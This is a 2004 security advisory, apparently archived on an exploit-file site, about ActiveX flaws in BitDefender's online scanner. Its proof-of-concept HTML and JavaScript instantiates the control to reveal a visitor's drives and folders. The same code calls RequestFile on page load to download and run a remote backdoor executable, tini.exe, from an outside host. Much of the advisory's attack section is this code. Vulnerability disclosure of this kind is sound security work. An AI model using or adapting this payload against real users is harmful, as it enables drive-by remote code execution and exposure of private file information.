bitdefender.txt

bitdefender.txt: Posted Apr 19, 2004; Authored by Rafel Ivgi | Site theinsider.deep-ice.com; BitDefender's online scanning service has Active-X related flaws that allow an attacker to run arbitrary code server side.; tags | advisory, arbitrary, activex; SHA-256 | b99278bb29477cd2c8b3b823340d554551425884717cdd650dc007d6d6ad6370; Download | Favorite | View

bitdefender.txt

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:  BitDefender Scan Online(ActiveX)
Vendors:        http://www.bitdefender.com/scan/Msie/index.php
Platforms:      Windows
Bug:                Remote File Download & Execute & Private Information
Disclosure
Risk:                High - Running Arbitary Code
Exploitation:   Remote with browser
Date:               19 Apr 2004
Author:           Rafel Ivgi, The-Insider
e-mail:             the_insider@mail.com
web:                http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

This is a quote of BitDefender Scan Online Description:
"BitDefender Scan Online is a fully functional antivirus product, with a
web-based interface and featuring all required elements for remotely
antivirus scanning and cleaning: it scans system's memory, all files,
folders and drives' boot sector, providing the user with the option to
automatically clean the infected files.

This is a quote of the page title:
"BitDefender AntiVirus - Data Security, AntiVirus Software, Free
Protection".
The meaning of this sentence is very far from reality.
I believe this to be a ridiculous that an AntiVirus will deliver and execute
a virus on my system.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

"BitDefender Scan Online" downloads its components and registered
the following COM/ActiveX Object:

"AVXSCANONLINE.AvxScanOnlineCtrl.1"
With the following CLSID:
80DD2229-B8E4-4C77-B72F-F22972D723EA

"BitDefender Scan Online" has confusing protection, all properties and
functions cannot be set/accessed by the :

object = new ActiveXObject("AVXSCANONLINE.AvxScanOnlineCtrl.1")

It can only be set/accessed using(html object tag created object):

"<OBJECT id=mymy
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>"
----------------------------------------------------------------------------
--------------------------------------------------

"BitDefender Scan Online" Disclosures the users information, allowing a
remote user to see
all drives and folders of the system using this simple code:

------------------- CUT HERE -------------------
<OBJECT id=seemycomputer
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></OBJECT>
------------------- CUT HERE -------------------

----------------------------------------------------------------------------
--------------------------------------------------

"BitDefender Scan Online" contains a function that will

***DOWNLOAD A REMOTE FILE AND WILL EXECUTE IT ON THE SYSTEM***

For Example:
object.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\");

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

This is Proof Of Concept Code:
------------------- CUT HERE -------------------
<OBJECT id=mymy
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
<PARAM NAME="Id" VALUE="Trusted">
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></object>
<script>
var a;

function cool() {
mymy.Update();
mymy.Updating(1);
mymy.SetCountry("Israel");
mymy.EnableRtvr(1);
mymy.SetupMode = true;
mymy.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\");
}

 setTimeout("cool()", 1500);
</script>
------------------- CUT HERE -------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- 
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Only the one who sees the invisible , Can do the Impossible."

Top Authors In Last 30 Days

Red Hat 237 files
indoushka 157 files
Jay Turla 150 files
Ubuntu 68 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,119)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,136)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,775)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,828)
UNIX (9,454)
UnixWare (188)
Windows (6,766)
Other

bitdefender.txt

bitdefender.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

bitdefender.txt

Share This

bitdefender.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems